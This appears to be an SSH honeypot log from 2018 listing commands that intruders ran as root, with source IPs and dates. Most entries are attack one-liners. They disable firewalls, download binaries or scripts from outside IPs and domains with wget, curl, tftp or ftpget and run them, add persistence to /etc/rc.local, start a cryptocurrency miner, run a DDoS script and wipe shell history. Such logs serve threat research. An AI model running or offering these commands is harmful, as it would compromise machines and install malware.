From 192.99.100.158 9-Jan-2018 15:43:01 ssh2 root Exec uname -a & lscpu & free -mt uname -a & lscpu & free -mt From 31.192.105.199 11-Jan-2018 12:52:55 ssh2 root Exec wget http://27.255.91.139:1234/sshd -O /tmp/sshd wget http://27.255.91.139:1234/sshd -O /tmp/sshd From 61.171.158.11 13-Jan-2018 22:17:25 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://win.pj0.pw:54321/new26;chmod 777 new26;./new26; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget http://win.pj0.pw:54321/new26 chmod 777 new26 ./new26 From 183.17.59.49 14-Jan-2018 12:56:37 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://103.104.106.90:808/java;chmod 777 java;./java;echo "cd /tmp/">>/etc/rc.local;echo "./java&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://103.104.106.90:808/java chmod 777 java ./java echo "cd /tmp/">>/etc/rc.local echo "./java&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 115.207.120.226 14-Jan-2018 22:42:45 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://123.249.27.28:818/lihai;chmod 777 lihai;./lihai; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://123.249.27.28:818/lihai chmod 777 lihai ./lihai From 219.234.3.6 15-Jan-2018 10:01:37 ssh2 root Exec echo 'working4141'; echo 'working4141' From 115.207.120.226 15-Jan-2018 23:08:05 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://123.249.27.28:818/tret;chmod 777 tret;./tret; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://123.249.27.28:818/tret chmod 777 tret ./tret From 115.207.120.226 16-Jan-2018 04:01:09 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://123.249.27.28:818/test;chmod 777 test;./test; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://123.249.27.28:818/test chmod 777 test ./test From 115.207.120.226 16-Jan-2018 13:47:17 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://123.249.42.143:818/nud;chmod 777 nud;./nud; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://123.249.42.143:818/nud chmod 777 nud ./nud From 115.207.120.226 17-Jan-2018 04:26:29 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://123.249.42.143:818/uxd;chmod 777 uxd;./uxd; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://123.249.42.143:818/uxd chmod 777 uxd ./uxd From 115.207.120.226 17-Jan-2018 14:12:37 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://123.249.42.143:818/yutr;chmod 777 yutr;./yutr; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://123.249.42.143:818/yutr chmod 777 yutr ./yutr From 104.160.185.192 19-Jan-2018 15:03:17 ssh2 root Exec uname -n -r -s -v uname -n -r -s -v From 60.250.99.131 21-Jan-2018 11:00:53 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://60.250.99.131:9998/services;chmod 777 services;./services;echo "cd /tmp/">>/etc/rc.local;echo "./services&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://60.250.99.131:9998/services chmod 777 services ./services echo "cd /tmp/">>/etc/rc.local echo "./services&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 185.58.193.149 21-Jan-2018 20:47:01 ssh2 root Exec bash; sh; enable; system; cat | sh; bash sh enable system cat | sh From 185.58.193.149 22-Jan-2018 11:26:13 ssh2 root Exec cd /tmp;wget http://185.58.193.149/botz.sh;chmod +x *;sh botz.sh cd /tmp wget http://185.58.193.149/botz.sh chmod +x * sh botz.sh From 185.58.193.149 22-Jan-2018 16:19:17 ssh2 root Exec cd /tmp;wget http://185.58.193.149/botz.sh;chmod +x *;sh botz.sh;cd /tmp;curl http://185.58.193.149/botz.sh >> botz.sh;chmod +x *;sh botz.sh cd /tmp wget http://185.58.193.149/botz.sh chmod +x * sh botz.sh cd /tmp curl http://185.58.193.149/botz.sh >> botz.sh chmod +x * sh botz.sh From 220.163.125.147 24-Jan-2018 01:00:57 ssh2 root Exec curl -fsSL http://165.225.157.157:8000/i.sh | sh curl -fsSL http://165.225.157.157:8000/i.sh | sh From 185.58.193.149 24-Jan-2018 02:30:45 ssh2 root Exec cd /tmp;rm -rf *;wget http://185.58.193.149/botz.sh;chmod +x *;sh botz.sh;cd /tmp;curl http://185.58.193.149/botz.sh >> botz.sh;chmod +x *;sh botz.sh cd /tmp rm -rf * wget http://185.58.193.149/botz.sh chmod +x * sh botz.sh cd /tmp curl http://185.58.193.149/botz.sh >> botz.sh chmod +x * sh botz.sh From 185.58.193.149 24-Jan-2018 12:16:53 ssh2 root Exec cd /tmp;rm -rf *;wget http://178.128.185.250/e -O botzz.sh;chmod +x *;sh botzz.sh cd /tmp rm -rf * wget http://178.128.185.250/e -O botzz.sh chmod +x * sh botzz.sh From 183.60.107.165 24-Jan-2018 17:09:57 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.60.107.165:6547/Linux2.6;chmod 777 Linux2.6;./Linux2.6; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://183.60.107.165:6547/Linux2.6 chmod 777 Linux2.6 ./Linux2.6 From 140.143.35.89 30-Jan-2018 19:41:57 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://122.152.219.127:54321/xxs66;chmod 777 xxs66;./xxs66; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget http://122.152.219.127:54321/xxs66 chmod 777 xxs66 ./xxs66 From 140.143.35.89 4-Feb-2018 02:16:21 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://140.143.35.89:43768/xxs66;chmod 777 xxs66;./xxs66; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget http://140.143.35.89:43768/xxs66 chmod 777 xxs66 ./xxs66 From 185.58.193.149 8-Feb-2018 13:43:49 ssh2 root Exec cd /tmp; rm -rf *; wget http://199.195.254.118/sh.sh; /bin/busybox curl -O http://199.195.254.118/sh.sh; /bin/busybox wget http://199.195.254.118/sh.sh; sh sh.sh; cd /tmp rm -rf * wget http://199.195.254.118/sh.sh /bin/busybox curl -O http://199.195.254.118/sh.sh /bin/busybox wget http://199.195.254.118/sh.sh sh sh.sh From 185.220.101.46 9-Feb-2018 20:38:39 ssh2 root Exec uname -s uname -s From 82.211.44.44 14-Feb-2018 01:36:37 ssh2 root Exec wget -q -O - http://dl.peanutman.ru/ptshell|sh && curl -fsSL http://dl.peanutman.ru/ptshell|sh wget -q -O - http://dl.peanutman.ru/ptshell|sh && curl -fsSL From 185.58.193.149 14-Feb-2018 21:08:53 ssh2 root Exec wget http://185.58.193.149/root-1234 wget http://185.58.193.149/root-1234 From 119.29.190.75 20-Feb-2018 13:54:45 ssh2 root Exec curl -fsSL http://120.25.66.201:8000/i.sh | sh curl -fsSL http://120.25.66.201:8000/i.sh | sh From 164.132.58.90 23-Feb-2018 10:17:41 ssh2 root Exec uname -n -s -r -v ; curl -O adyhax0r.000webhostapp.com/ddos ; perl ddos ; rm -rf ddos ; history -c uname -n -s -r -v curl -O adyhax0r.000webhostapp.com/ddos perl ddos rm -rf ddos history -c From 222.82.245.76 25-Feb-2018 09:13:27 ssh2 root Exec cd /tmp; wget http://185.244.25.153/ww || curl -O http://185.244.25.153/ww; chmod 777 ww; sh ww; rm -rf ww; tftp 46.243.189.109 -c get tt; chmod 777 tt; sh tt; tftp -r tt1 -g 46.243.189.109; chmod 777 tt1; sh tt1;rm -rf /var/tmp/; rm -rf /var/tmp/. cd /tmp wget http://185.244.25.153/ww || curl -O http://185.244.25.153/ww chmod 777 ww sh ww rm -rf ww tftp 46.243.189.109 -c get tt chmod 777 tt sh tt tftp -r tt1 -g 46.243.189.109 chmod 777 tt1 sh tt1 rm -rf /var/tmp/ rm -rf /var/tmp/. From 180.139.100.108 26-Feb-2018 21:19:49 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http;Lin5ux2.6 777 Lin5ux2.6;./Lin5ux2.6; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http Lin5ux2.6 777 Lin5ux2.6 ./Lin5ux2.6 From 222.82.245.76 27-Feb-2018 12:58:17 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.153/8UsA.sh; curl -O http://185.244.25.153/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 185.244.25.153 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 185.244.25.153; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.244.25.153 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt wget http://185.244.25.153/8UsA.sh curl -O http://185.244.25.153/8UsA.sh chmod 777 8UsA.sh sh 8UsA.sh tftp 185.244.25.153 -c get t8UsA.sh chmod 777 t8UsA.sh sh t8UsA.sh tftp -r t8UsA2.sh -g 185.244.25.153 chmod 777 t8UsA2.sh sh t8UsA2.sh ftpget -v -u anonymous -p anonymous -P 21 sh 8UsA1.sh rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh rm -rf * From 116.230.199.212 28-Feb-2018 02:38:13 ssh2 root Exec cd /tmp;/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c -t 10 -T 10 http://140.143.35.89:43768/com.json;wget -c -t 10 -T 10 http://140.143.35.89:43768/zjgw;chmod 777 zjgw;./zjgw --config cd /tmp /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c -t 10 -T 10 http://140.143.35.89:43768/com.json wget -c -t 10 -T 10 http://140.143.35.89:43768/zjgw chmod 777 zjgw ./zjgw --config From 146.185.239.17 13-Mar-2018 08:09:13 ssh2 root w cat /pro cp cat /proc/cpuinfo w ps ax /sbin/ifconfig arp -a /sbin/arp -a gcc whereis arp wget uptime cat /etc/passwd ps last exit From 60.13.226.161 25-Mar-2018 14:11:33 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://60.13.226.161:6487/mprs.6;chmod 777 mprs.6;./mprs.6; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://60.13.226.161:6487/mprs.6 chmod 777 mprs.6 ./mprs.6 From 60.13.226.161 27-Mar-2018 15:02:13 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://103.255.177.139:280/Lin5ux2.6;chmod 777 Lin5ux2.6;./Lin5ux2.6; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://103.255.177.139:280/Lin5ux2.6 chmod 777 Lin5ux2.6 ./Lin5ux2.6 From 77.87.77.147 29-Mar-2018 21:11:58 ssh2 root mv .bash_history .bash_history2 free -m cat /proc/cpuinfo| grep wget cd /etc wget http://www.asdq.cf:67/wget.sh chmod 777 wget.sh ./wget.sh cd /etc wget http://www.asdq.cf:67/wget.sh chmod 777 wget.sj ./wget.sh cd /etc curl -o curl.sh http://www.asdq.cf:67/curl.sh chmod 777 curl -o curl.sh http://www.asdq.cf:67/curl.sh wget wget -o wget.sh http://www.asdq.cf:67/wget.sh cd mv .bash_history2 .bash_history vi .bash_history From 77.87.77.147 30-Mar-2018 11:25:09 ssh2 root mv .bash_history .bash_history2 free -m cat /proc/cpuinfo| grep wget cd /etc wget http://www.asdq.cf:67/wget.sh chmod 777 wget.sh ./wget.sh cd /etc wget http://www.asdq.cf:67/wget.sh chmod 777 wget.sj ./wget.sh cd /etc curl -o curl.sh http://www.asdq.cf:67/curl.sh chmod 777 curl -o curl.sh http://www.asdq.cf:67/curl.sh wget wget -o wget.sh http://www.asdq.cf:67/wget.sh cd mv .bash_history2 .bash_history vi .bash_history From 182.23.66.230 5-Apr-2018 05:40:27 ssh2 root Exec uname -a && lscpu uname -a && lscpu Exec uname -a && lscpu uname -a && lscpu Exec uname -a && lscpu uname -a && lscpu From 182.23.66.230 9-Apr-2018 02:49:09 ssh2 root Exec uname -a && lscpu uname -a && lscpu Exec uname -a && lscpu uname -a && lscpu From 60.250.99.131 9-Apr-2018 23:31:05 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://60.250.99.131:9998/services;chmod 777 services;./services; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://60.250.99.131:9998/services chmod 777 services ./services From 140.143.35.89 15-Apr-2018 08:24:21 ssh2 root Exec cd /etc;rm -f shz.sh;chattr -i /usr/bin/wget;chmod 777 /usr/bin/wget;wget http://140.143.35.89:43768/shz.sh;get http://140.143.35.89:43768/shz.sh;nohup sh shz.sh & cd /etc rm -f shz.sh chattr -i /usr/bin/wget chmod 777 /usr/bin/wget wget http://140.143.35.89:43768/shz.sh get http://140.143.35.89:43768/shz.sh nohup sh shz.sh & From 113.65.25.46 16-Apr-2018 21:06:33 ssh2 root yum -y install wget wget -N --no-check-certificate https://softs.fun/Bash/ssr.sh yum -y install wget wget -N --no-check-certificate https://softs.fun/Bash/ssr.sh && chmod +x ssr.sh From 111.67.194.29 6-May-2018 02:37:09 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.67.194.29:32322/Manager;chmod 777 Manager;./Manager; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://111.67.194.29:32322/Manager chmod 777 Manager ./Manager From 182.186.197.168 6-May-2018 22:09:25 ssh2 root free -m ls ls -lia uname -a exit From 182.186.197.168 14-May-2018 10:52:53 ssh2 root ls free -m exit From 218.29.241.22 6-Jun-2018 10:49:25 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://111.73.46.37/xudp;chmod 777 xudp;./xudp;echo "cd /tmp/">>/etc/rc.local;echo "./xudp&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://111.73.46.37/xudp chmod 777 xudp ./xudp echo "cd /tmp/">>/etc/rc.local echo "./xudp&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 46.36.41.150 27-Jun-2018 14:48:21 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.36.39.40/hackers.sh; chmod 777 hackers.sh; sh hackers.sh; tftp 46.36.39.40 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 46.36.39.40; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 46.36.39.40 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf hackers.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt wget http://46.36.39.40/hackers.sh chmod 777 hackers.sh sh hackers.sh tftp 46.36.39.40 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 46.36.39.40 chmod 777 tftp2.sh sh tftp2.sh ftpget -v -u anonymous -p anonymous -P 21 sh ftp1.sh rm -rf hackers.sh tftp1.sh tftp2.sh ftp1.sh rm -rf * From 39.118.214.171 3-Aug-2018 15:46:29 ssh2 root Exec echo 646 echo 646 From 115.126.100.81 10-Aug-2018 10:45:37 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /etc;yum install -y wget;wget -c http://115.126.100.81:9960/chongfu.sh;chmod 777 chongfu.sh;./chongfu.sh; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /etc yum install -y wget wget -c http://115.126.100.81:9960/chongfu.sh chmod 777 chongfu.sh ./chongfu.sh From 84.2.106.82 19-Aug-2018 12:05:55 ssh2 root Exec /bin/sh -c "echo hi" /bin/sh -c "echo hi" From 212.237.2.20 25-Aug-2018 15:17:41 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.83.93/haknit.sh; curl -O http://80.211.83.93/haknit.sh; chmod 777 haknit.sh; sh haknit.sh; tftp 80.211.83.93 -c get thaknit.sh; chmod 777 thaknit.sh; sh thaknit.sh; tftp -r thaknit2.sh -g 80.211.83.93; chmod 777 thaknit2.sh; sh thaknit2.sh; ftpget -v -u anonymous -p anonymous -P 21 80.211.83.93 haknit1.sh haknit1.sh; sh haknit1.sh; rm -rf haknit.sh thaknit.sh thaknit2.sh haknit1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt wget http://80.211.83.93/haknit.sh curl -O http://80.211.83.93/haknit.sh chmod 777 haknit.sh sh haknit.sh tftp 80.211.83.93 -c get thaknit.sh chmod 777 thaknit.sh sh thaknit.sh tftp -r thaknit2.sh -g 80.211.83.93 chmod 777 thaknit2.sh sh thaknit2.sh ftpget -v -u anonymous -p anonymous -P 21 sh haknit1.sh rm -rf haknit.sh thaknit.sh thaknit2.sh haknit1.sh rm -rf * From 117.200.76.7 29-Aug-2018 20:29:07 ssh2 root Exec echo -ne 'aaa' || echo -ne 'bbb' echo -ne 'aaa' || echo -ne 'bbb' From 117.200.76.7 30-Aug-2018 06:50:05 ssh2 root Exec ping 999.999.999.999 ping 999.999.999.999 From 117.200.76.7 30-Aug-2018 17:11:03 ssh2 root Exec free -m free -m From 117.200.76.7 31-Aug-2018 03:32:01 ssh2 root Exec /bin/busybox wget /bin/busybox wget From 117.200.76.7 31-Aug-2018 13:52:59 ssh2 root Exec nohup ./xrig -a cryptonight -o us-east.cryptonight-hub.miningpoolhub.com:20580 -u c646.miner -p x & nohup ./xrig -a cryptonight -o us-east.cryptonight-hub.miningpoolhub.com:20580 -u c646.miner From 117.200.76.7 1-Sep-2018 00:13:57 ssh2 root Exec nohup ./upcheck.sh || bash ./upcheck.sh & nohup ./upcheck.sh || bash ./upcheck.sh & From 183.93.123.134 15-Sep-2018 11:17:43 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /etc;yum install -y wget;wget -c http://222.186.139.216:9960/chongfu.sh;chmod 777 chongfu.sh;./chongfu.sh; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /etc yum install -y wget wget -c http://222.186.139.216:9960/chongfu.sh chmod 777 chongfu.sh ./chongfu.sh From 116.31.99.114 18-Sep-2018 08:53:11 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.138.8:3333/sssiu;chmod 777 sssiu;./sssiu; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.138.8:3333/sssiu chmod 777 sssiu ./sssiu From 51.255.172.246 23-Sep-2018 10:54:32 ssh2 root Exec cat /etc/issue ; lscpu ; free -g cat /etc/issue lscpu free -g From 145.239.187.193 26-Sep-2018 07:15:58 ssh2 root Exec uname -n -s -v -r uname -n -s -v -r From 213.147.165.148 3-Oct-2018 00:28:50 ssh2 root w uname -a uname -a -a -a -a -a -a -a last cat /proc/cpuinfo cd /var/tmp wget wget futem.pe.hu7caratier.tgz wget futem.pe.hu/cartier.tgz wget http://futem.pe.hu/cartier.tgz cd id ls -a ps -x From 58.218.66.91 9-Oct-2018 15:11:46 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.73.45.223:222/8888;chmod 777 8888;./8888; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://111.73.45.223:222/8888 chmod 777 8888 ./8888 From 220.170.45.104 12-Oct-2018 13:41:46 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://123.249.71.226:1111/xiyang;chmod 777 xiyang;./xiyang; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://123.249.71.226:1111/xiyang chmod 777 xiyang ./xiyang From 185.244.25.105 13-Oct-2018 20:18:25 ssh2 root Exec cd /tmp; rm -rf /tmp/mezy; wget http://185.141.61.17/css/bg.css -O /tmp/mezy; chmod 777 /tmp/mezy; sh /tmp/mezy; rm -rf /tmp/mezy/ cd /tmp rm -rf /tmp/mezy wget http://185.141.61.17/css/bg.css -O /tmp/mezy chmod 777 /tmp/mezy sh /tmp/mezy rm -rf /tmp/mezy/ From 58.218.56.102 15-Oct-2018 22:50:49 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://118.184.50.24:7772/ppol;chmod 777 ppol;./ppol;chattr +i /tmp/ppol;echo "cd /tmp/">>/etc/rc.local;echo "./ppol&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://118.184.50.24:7772/ppol chmod 777 ppol ./ppol chattr +i /tmp/ppol echo "cd /tmp/">>/etc/rc.local echo "./ppol&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 58.218.205.241 24-Oct-2018 02:17:00 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://58.218.205.241:5/Warry;chmod 777 Warry;./Warry; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://58.218.205.241:5/Warry chmod 777 Warry ./Warry From 109.230.199.157 18-Nov-2018 07:42:27 ssh2 root ls id cat /etc/issue cat /etc/release cat /etc/version ifconfig apt yum ls cd ls -a cat test.pl ls ls -a ifconfig php -V ls cat rest1.pl cat ipcalc.pl cat * ls cd .ssh ls From 62.176.21.131 29-Nov-2018 02:45:20 ssh2 root Exec cat /proc/cpuinfo cat /proc/cpuinfo From 109.166.132.127 16-Dec-2018 09:52:25 ssh2 root unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG export export HISTSIZE=0 export HISTFILESIZE=0 whereis sendmail